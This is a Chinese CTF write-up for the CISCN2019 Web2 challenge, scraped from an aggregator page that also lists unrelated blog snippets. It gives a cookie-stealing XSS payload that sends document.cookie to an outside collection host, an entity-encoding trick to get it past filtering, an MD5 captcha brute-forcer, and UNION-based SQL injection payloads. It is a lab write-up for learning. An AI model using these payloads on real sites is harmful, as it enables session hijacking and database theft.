绿冰壶
绿冰壶

[CISCN2019 华东北赛区]Web2

[CISCN2019 华东北赛区]Web2

前言

特别好的一道题,做完神清气爽,学到好多东西

知识点

xss 攻击获取cookie

buu攻击平台

利用 cookie 获取管理员权限

获取到管理员cookie后,利用控制台中的application模块,修改页面cookie

md5验证码哈希

import hashlib

def func(md5_val):
    for x in range(999999, 100000000):
        md5_value=hashlib.md5(str(x)).hexdigest()
        if md5_value[:6]==md5_val:
            return str(x)

if __name__ == '__main__':
    print func('01f24d')

html mark 转义

xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=PwHGmy&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''
output = ""
for c in xss:
    output += "&#" + str(ord(c))

print(" + output + "")")

sql inject by hand

各阶段payload

-1 union select 1,group_concat(schema_name),3 from information_schema.schemata#

-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ciscn'#

-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#

-1 union select 1,group_concat(flagg),3 from flag#

题解

进入环境 dirsearch 扫一下

发现

index.php

 admin.php

 login.php

 register.php

 post.php

 commitbug.php

 about.php

这些页面。

都尝试访问一下,发现admin.php访问不了,需要权限

然后注册登录,发现这是一个类似博客的界面,且能提交文章

所以大概能感觉到这是xss了(排除ssti)

我们利用题目给的xss平台

[CISCN2019 华东北赛区]Web2_第1张图片

新建一个项目,使用默认模块,保存后查看代码,复制下来微调一下

(function(){
     (new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=PwHGmy&location='+escape((function()//注意本行id内容
                                                                                                 {
     try{
     return document.location.href}catch(e){
     return ''}})())+'&toplocation='+escape((function(){
     try{
     return top.location.href}catch(e){
     return ''}})())+'&cookie='+escape((function(){
     try{
     return document.cookie}catch(e){
     return ''}})())+'&opener='+escape((function(){
     try{
     return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){
     return ''}})());})();

微调内容:把newImage().src改为window.location.hre

复制到if就停止

注意:这里复制的一定是查看自己项目的代码。否则id就会是{projectID}而不是本项目的id

然后使用html mark转码防止转义

转义代码在知识点中,也可以在线工具

转义完得到

点击上传文章,把转义后的代码上传上去

[CISCN2019 华东北赛区]Web2_第2张图片

然后点击链接查看文章,快速查看源码不然跳回主页了就

[CISCN2019 华东北赛区]Web2_第3张图片

复制阴影部分url 前面添加http://web.

作为反馈内容

[CISCN2019 华东北赛区]Web2_第4张图片

这里需要爆破md5 验证码,上脚本(上文知识点)

输入验证码成功反馈之后 回到xss平台获取管理员cookie 有了密钥就可以cookie欺骗访问admin.php了

[CISCN2019 华东北赛区]Web2_第5张图片

打开发现是个输入框,测试之后发现是最基础的sql手工注入嗯,很愉快的就搞定了

入验证码成功反馈之后 回到xss平台获取管理员cookie 有了密钥就可以cookie欺骗访问admin.php了

[外链图片转存中…(img-VquqYKJE-1620872847307)]

打开发现是个输入框,测试之后发现是最基础的sql手工注入嗯,很愉快的就搞定了

[CISCN2019 华东北赛区]Web2_第6张图片

你可能感兴趣的:([CISCN2019 华东北赛区]Web2)

  • 第十三章 我们都是做大事的人 霈霖霖
    第十三章我们都是做大事的人结过账,安顿好王龙德以后,我准备会华创3303,真准备出门的时候,王龙德跟我说:“萧哥,我这有点事”“什么事?”我问“萧哥,你能帮我卖一瓶矿泉水和一包瓜子么?”王龙德文“咱们俩一起去吧”我说,“正好你也送送我”“那算了吧”王龙德说“我先睡了”“行,明天早晨我来找你”我说打车回到华创楼下,想想今天确实很憋屈,上楼也是没有什么意思,就准备在楼下转转。华创国际往西关大街走的路上
  • 剩28天19年12月3日星期二 晴朗 岁月流转足迹可循
    图片发自App图片发自App图片发自App图片发自App昨天升完旗,去操场上走走,才发现霜是如此之重,脚踩上去,都有凝粒!天是越来越冷了!不过晴空净爽,空气清冽,一呼一吸之间很是舒服!中午写了几个大字,童爸说笔画还有些软,一语中的。需用心提升,贵在坚持坚持吧!下午做了张丽华的顺车,捎我到陈仓元,再坐了3路到西关,费时50分钟!晚上吃完饭送童去学校,到八点半下楼运动半小时,跳了500个绳,弯弯腰!感
  • 花开有期 灿烂jx
    每一朵花开,都有自己的时序,就像每一个人的成长和未来,都有他自己的机缘与时间表,急不得。记得东北有句老话叫做“心急吃不了热豆腐”,就是说做啥事儿都要沉住气,不慌不忙,不要急也不要躁。东北还有一句老话叫做“忙中出错”,就是说遇到事情时不要慌,先要稳住自己的情绪,稳住自己的内心,否则就会忙中出错,欲速不达。想起一句“拔苗助长”的成语,说的也是这个道理。克服不了心急气躁的毛病,做什么事情都容易出问题,要
  • 日更77/365:谈贵人 文案策划人春晓
    昨天组长华麟在群里分享了这么一句话:你人生中的贵人是谁?如果对于这个问题,你没有答案,那么这本身也是一个答案,我建议你转移一点埋头苦干的精力,用这些精力去投资一个贵人。我想了一下,我人生中的贵人,是谁呢?上学时,可能是那个初中总是夸奖我的语文老师,因为她的鼓励,我才对学习越发产生了兴趣。工作后,可能是友善的老板和同事,他们给我莫大的工作上的帮助。老师会全心全意的帮你,出来职场上呢,可能就要你多花一
  • 2023-08-05 余則徐
    2023.8.5.达视津气象2023.8.5.达视津气象朋友们早上好!今天是2023.8.5.星期六,农历六月十九3:04;此时的干支历法是癸卯年己未月乙未日戊寅时。台风卡努慢跑游行到东海后,拐了个锐角大弯,逐渐远离我国,向日本列岛进发,其边缘所及,可能还将会影响东北气象。天津昨天中雨。当前,气象软件又有矛盾:从日出后的6点到17点的逐小时预报时时有雨,但今天开始的逐日预报却是连续阴天无雨,看来超
  • 「华与华品牌五年计划」西贝蒙古牛大骨产品从0-1;2023-11-10 戢程
    这节让我看到了西贝「蒙古牛大骨」从「产品命名」、「购买理由」和「推广宣传」三大方面进行产品开发的思路以及整个过程中的五大关键动作。文中写道:“产品即购买理由,产品命名即购买理由。我们把幸福牛大骨重新命名为蒙古牛大骨,建立新品类,一键切换母体。”第一个关键动作是对产品进行重新命名,重新命名的过程其实也是在对产品进行重新编码,通过在「牛大骨」前加上「蒙古」这个词汇,使「牛大骨」这个产品回到并寄生在「蒙
  • 我的投资经历 梅_2bd0
    08年大街小巷都在讨论股票基金时,当大家每天都是赚钱的喜报,我再也经不住诱惑,华创证券开户,听朋友每天每天的股评,所以心动跟风了,最后就是一分没赚到,亏了个底朝天,从此听股心寒。经历了千股跌停,开市一会,就停市的熔断机制,现在想起心里都还拔凉拔凉的。直到股市跌到2200多点时,经朋友介绍,接触了定投基金银行的朋友说,基金定投很好,比存定期划算多,当时大盘也是2千多点,朋友说买基金是买国运,想想国家
  • 二月难忘,未来可期 悠之不语斋
    大家好,我是来自河南项城莲溪初级中学的龚淑华,非常荣幸能在这里交流分享,我分享的题目是《二月难忘,未来可期》就在今天冬天,我们美丽的神州大地,上亿万家庭迎来了一场突如其来的没有硝烟的战争,全国各地像按下了暂停键一样,二月,也一改往日的喧嚣,全国人民,同心抗疫。同时,也让我们人类有时间静静的深深的思索,人类需要大自然、大自然不需要人类。人类的确应该敬畏大自然,否则,后果严重的无法想象!在这个二月里,
  • 记沙盘练习小组第二次课程 心理师刘津伶
    图片发自App运华日记第297篇(2018.9.25周二)记沙盘练习小组第二次课程外面下着飘泼大雨,依然没有阻挡住沙盘实操练习第一期小组成员第二次练习的脚步。课程开始前,每人分享了第一次沙盘练习的收获:有的说通过第一次沙盘发现了自己以前不曾看到的一面,重新认识了自己,看见了自己害怕恐惧的一面;有的说通过第一次沙盘情绪得到了释放,回去之后心里舒服很多;有的说没做沙盘之前陷在问题里,而通过沙盘将自己抽
  • 2023年10月第4周(10月23日-10月29日) 安安淼淼
    这一周慢慢找回感觉。上次写周记还是五月份哦,这次就已经到十月底了,一旦搁置,再次拾起就是五个月已过去了。坚持做一件事的耐心和毅力还是不足呀。十月底的南方还处在夏天,习惯了北方一年四季的轮换,还没有适应南方大半年之长的夏天。一、读书1.华杉讲透《资治通鉴》18,15%;时隔一段时间,终于继续开始阅读第18本了。2.俞敏洪《老俞对谈录(全二册)》41%。很不错的一本书,在对谈中,领悟一点早该知道的人生
  • 特殊因素再升级,CBA外援难以回归,联赛重启时间待定! 陈晖篮球
    距离后半程联赛重启还有多久?这个问题慢慢已变成联赛后半程会不会以全华班形式开启?甚至是还能重启吗?类似的不确定性越来越多,但要相信拨开云雾见天明……未来重启CBA联赛的日子马上就要来啦!这是当下最美好的期待。尽管当下困难重重,但要坚信克服艰难险阻,重启CBA联赛的各方正在不断努力着。随着特殊因素再次升级,部分CBA外援暂时没法回归,包括几位CBA外教也不能及时归队。再加上CBA后半程赛季重启时间再
  • 古诗106 芍尔
    古诗106上元应制王珪雪消华月满仙台,万烛当楼宝扇开。双凤云中扶辇下,六鳌海上驾山来。镐京春酒沾周宴,汾水秋风陋汉才。一曲升平人尽乐,君王又进紫霞杯。王珪(1019—1085):宋庆历年间进士。官至参知政事。仙台:指宫中楼台。镐京:西周都城,在今陕西长安县附近。周宴:周武王曾在镐京大宴群臣,故以此喻宋代皇帝所设之宴。秋风:指汉武帝所赋《秋风辞》。
  • 【650】君子为人处世之道:只以君子之道待人处事,不向谁效忠,也不要求谁向我效忠2022-05-15 战略刘老师
    君子不跟人结党。君子没有盟友,没有“利益共同体”,没有“一致行动人”。因为君子的原则是全透明的,一切按大是大非的道义办,人人都知道,全世界都知道。君子是独立的,绝对不要“靠山”,也不要“家臣”。原文子曰:“君子矜而不争,群而不党。”华杉详解朱熹注解说:“庄以持己曰矜。然无乖戾之心,故不争。和以出众曰群。然无阿比之意,故不党。”“矜”,是庄重,拘谨。矜的本意,左边是个矛,是一种兵器,但没有刃,是仪仗
  • 生命本然的姿态 慧华姐
    慧华的第39篇原创,陪你一起成长尽日寻春不见春,芒鞋踏遍陇头云。归来笑拈梅花嗅,春在枝头已十分。一个真正有根底的人,犹如一棵自由生长的数吸收了世俗的阳光雨露长出来却是青枝翠叶,一树繁花都是生命本然的姿态,没有迎合,亦不对抗。世间情佛说佛语,人会人意,许多东西无关风月,却被误解为风月,只因作者和读者处于完全不同的语境。你见或者不见我就在那里不悲不喜你念或者不念情就在那里不来不去你爱或者不爱爱爱就在那
  • 彭华勇:厌学叛逆不读书,孩子爸爸/妈妈不学习怎么办? 彭华勇
    不少孩子家长加我微信,透过学习了解,逐步清晰,孩子的问题来源于家庭系统,要想孩子改变,必须家长先学习。这是一个很好的开始,一个很好的思维转变。但是有些家长可能又会有一些犹豫纠结,孩子问题来源于家庭系统,但是只有我一个人学习,孩子他爸又不学习,怎么办,有用吗?有些孩子爸爸愿意学习,但也会有疑惑,我一个人学习,孩子他妈不愿意学习,而且主要是孩子他妈在管教孩子,我学习有用吗?我常常说青春期的教育问题都是
  • “小A的救赎”焦点解决短期治疗手法在焦虑症个案中的运用 苋华
    中原焦点团队网中27苋华坚持分享第79天2021.4.18随着社会的快速发展和压力的增大,精神疾病的总量呈现上升趋势。焦虑症,又称为焦虑性神经症,是精神疾病中的神经症这一大类中最常见的一种,以焦虑情绪体验为主要特征。主要表现有两种,一种是正常的活动时突然发作的极度紧张、恐惧,心悸、窒息感,害怕自己会发疯或死去,濒死感,以致惊呼、求救;另一种则是经常的、持续的、无原因,也不知道针对什么的紧张、担心,
  • 《梦华录》顾千帆内心独白31:盼儿,你是我的死穴 雨点香儿读书
    接上回,于中全被押下去了,声声惨叫不绝于耳。这时,雷司公也闻讯匆匆赶来了。雷司公这个老狐狸,还想要袒护他,说什么我跟于中全不过是私怨,让我不要太过较真儿。我就知道这个雷敬定会包庇他,所以很早就收集了于中全的罪证,让雷敬不得已彻底把他放弃,并无奈地下令,由我随意处置。目的达成,我终于可以倾尽全力,对付于中全了,因为,他这次彻底把我激怒了。我把最狠毒、最残酷的刑罚——泡热汤,用在他身上是再适合不过了。
  • 反复出海的药王,已成为科学怪人,科学家体验与虎相伴 铁树开花耶
    【纯属虚构科幻作品天医殿主角埃米尔的好友之一药王袁园圆,上古神兽的化身,自成一只虎虎生威的白虎星球,濯濯生辉的宇宙星空间瞬移穿越,在地球上被赋予的使命是拯救人类健康的责任,要行的是天医之道。《天朝医宗》第61章:反复出海的药王】华亚医学在认可西医科学的同时,仍然在坚持自己的整体论,也仍然以头痛医脚的方式,治愈无数西医束手无策的疾病。药王袁园圆突然感觉自己融会贯通了一般,也在考虑那些分子,质子,中子
  • 《情仇》(53) 黑客之花_465f
    大伙聚精会神听着,都在想着一个问题。徐主任的妻侄有重大嫌疑,搞清楚这个所谓的妻侄与尹志华是否相识,许多线索自然会厘清。“老康,农垦局这位徐主任的妻侄,叫什么名字,有没有工作?”沈凌问道。康凯把最后一口馒头咽下去,咕咚咕咚喝几口水。“这些都不知道,农垦公安分局的高局长说,徐主任乘坐的火车4点钟到,他直接把徐主任接到公安局……。这是最早的一列火车。”“也只能这样了。”沈凌沉思一会,“小唐,你给万安乡派
  • 女教师情感日记(5) 871806d56353
    五,玩笑晚上八点来钟的时候,安然回来了,带着女儿冉冉。华子涛知道,安然肯定跟叶子联系过了。对于自己那一番摸不着头脑的电话,叶子和安然也肯定是起了疑心。安然说在新城华子涛是相信的,但和她一起的,也肯定不会是女人。是女人的话,她也就不会拿叶子当档箭牌了。从新城到家,差不多四十分钟的车程,加上安然和叶子的通话时间,再加上到安然娘家耽搁的时间,八点钟到家,时间上也就刚刚好。安然和女儿甫一进家门,便堆着一脸
  • 今天我当家(186) 贠大师
    【环境】公历2018.7.6农历2018.5.23星期五多云最高温度32.3℃最低温度19℃东北风3~4级老爸老妈去看亲戚去了,剩下我和两个捣蛋鬼在家。他俩一天的所有事情都由我负责,衣食住行,吃喝拉撒睡都得我安排。还有我自己的事情,照顾这两个捣蛋鬼,忙得我今天不亦乐乎。两顿饭做,洗刷都很费时。下午还要监督辅导作业。清理鸡舍,收拾家。还好天黑前老爸老妈回来了,真是谢天谢地,晚上还想看球赛。贠大师果园
  • 可以使你人生增值的四个好习惯 飘飘沙鸥
    俗话说:习惯决定性格,性格决定命运。多培养好习惯,可以助力我们的人生不断增值。每天运动一小时:跑步,散步,游泳,爬山,打球都可以。生命在于运动。运动会使我们的身体更健康。此生最重要的就是健康了。我们要重视健康,选择有益健康的生活方式。每天阅读,写读书笔记一小时:腹有诗书气自华这话绝对没错,读书能让我们增长知识,开阔视野,还能陶冶我们的情操,提高我们的气质。这是多少化妆品都无法掩盖的明媚和芳华。每天
  • 2021-11-28 一般人为什么炒股失败?在于人性!—《炒股的智慧》 树毛竹
    每天分享一本书。今天我分享的书:《炒股的智慧》。作者陈江挺,1962年生于福建,1982年毕业于上海交通大学,1983年赴美留学,分获机械工程和国际金融硕士学位。现以炒股为主。作者以在华尔街十多年投资股市的经验教训为感性素材,在研读了西方几百年来的炒股名著和炒股大师传记的基础之上,对投资股市最根本、最重要的问题进行了深入的思考和探索,对取得成功的方法和过程进行了大繁至简、提纲挈领的阐述,其中包括华
  • 学员分享~ 醉爱你的笑脸
    北大博雅家师学习99群的朋友们,早上好![太阳]我是您的朋友黄朝华,也是第49期参加北大博雅卢老师家师课程的学员,大多朋友未曾谋面,今先闻声,缘份缘份[爱心],感恩[玫瑰][玫瑰],期待彼此相见。我拥有俩青春期活宝,与我家姐姐似知心朋友,也总会灰谐地让我叫她“爸爸”,我如是叫她“爸爸”,顺便示个弱,让她扛点儿事[偷笑];弟弟则是活泼型皮娃,无法静处,三天不抽皮痒,在我和先生的混合双打中成长[呲牙]
  • 助力孩子成长日记第228天 宋胤鋆妈妈
    2018年7月20日星期五天气晴这些日子在东北没休息好,加上坐车不舒服,回来头疼,眼睛发涩,回家躺下迷糊了一天,昨晚很早就睡下了,儿子晚上练武回来我都不知道,早上我醒来的时候儿子已经预习了完了新课,背了弟子规。看我醒来儿子说:妈妈你在睡会吧,爸爸说你这些天太累了,所以昨晚练完武回来我自己去洗的澡,刷完牙就上楼睡了。我先下楼把每天的语文作业写完,吃了饭我叫爸爸把我送去武馆,你待会睡够了下楼吃饭吧。看
  • 广瑞感恩日记101 阎广瑞
    感恩亲爱的自己,对不起,请原谅,谢谢你,我爱你!感恩我的爸爸妈妈,感恩你们生我养我,谢谢谢谢谢谢感恩美好的一天,回程的路上,和月一起聊天,收获满满。的确,真实的表达自己的感受,家人之间最重要的是交流,和孩子也是一样。我万分幸运,并深深的感恩,感恩亚娟带我到营地,谢谢谢谢谢谢我万分幸运,并深深的感恩,感恩华姐带我回来,谢谢谢谢谢谢我万分幸运,并深深的感恩,感恩秀姐给我好的穿搭建议和美衣,谢谢谢谢谢谢
  • 主题明确的好文章 米_小米
    如何找到切入角度1.切入角度要尽可能的小婚姻举例:001《你要对我好,我才可能对你父母好》切入角度小,主题明确、不容易跑偏,相对于容易注意不要不好高,大,全,写成百科全书2.角度要新颖大量的阅读和知识储备量2个方法001反其道而行之三生三世中的夜华,夜华不值得嫁角度要能站住脚,要大众认同002形成反差003观点要与时俱进(主流观点不要过时的观点)004考虑受众常用写作结构001层层递进是什么?为什
  • 成长足迹第75天 dream11
    今天孩子很开心,因为数学考试考的还不错。吃完饭,抓紧时间写作业。因为作业完成之后,我们还有一个艰巨的任务,画一幅画。从网上找了半天,找不满意的。最后好不容易找到了一副既简单又还算好看的元旦画作。华了一个多小时的时间,画完加涂颜色之后,看了还不是很满意。我故意问,孩子,要是咱们得画选不上怎么办?没想到人家轻松的说,那怎么了,画了总比不画好吧!嗯!还不错,心态挺好的。早点休息!明天继续努力!
  • 拾久|好久不见 博文拾久
    从19岁开始,进入餐饮行业,到现在已经是十九个年头了!图片发自App十九年以来,起伏高低起起落落,从南方的东莞,深圳,河源,再到北方的北京,天津,东北的沈阳~图片发自App一路走来坎坷曲折,从高端走向大众,我经历过中国餐饮最高峰的阶段,一直以来我也自认为自己是一个职业经理人,其实按照我的成长历程来讲,我应该是一个年少成名的人,为什么今天没有呢?图片发自App多次,我都自己问自己,是不是我自己的才华
  • 秋分杂感 铅笔芒种
    今天秋分。连续阴天,秋分日也没有见到蓝湛湛的天,有点遗憾。东北的秋天,向来都是秋高气爽的明媚。今年真是个例外。这时候,该是大田庄稼要收获的时候了,正需要充足的温度和干燥,连日的阴沉天气,怕是对庄稼的收成有不小的影响。今年就是不容易啊。今年哪里都不容易。疫情的阴影还没有完全消散。夏天,南方水灾,北方又旱。上秋,北方又涝。世界变得动荡。个体呢,居家办公地九月,才终于回到校园。今年只剩最后一个季度了。却
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他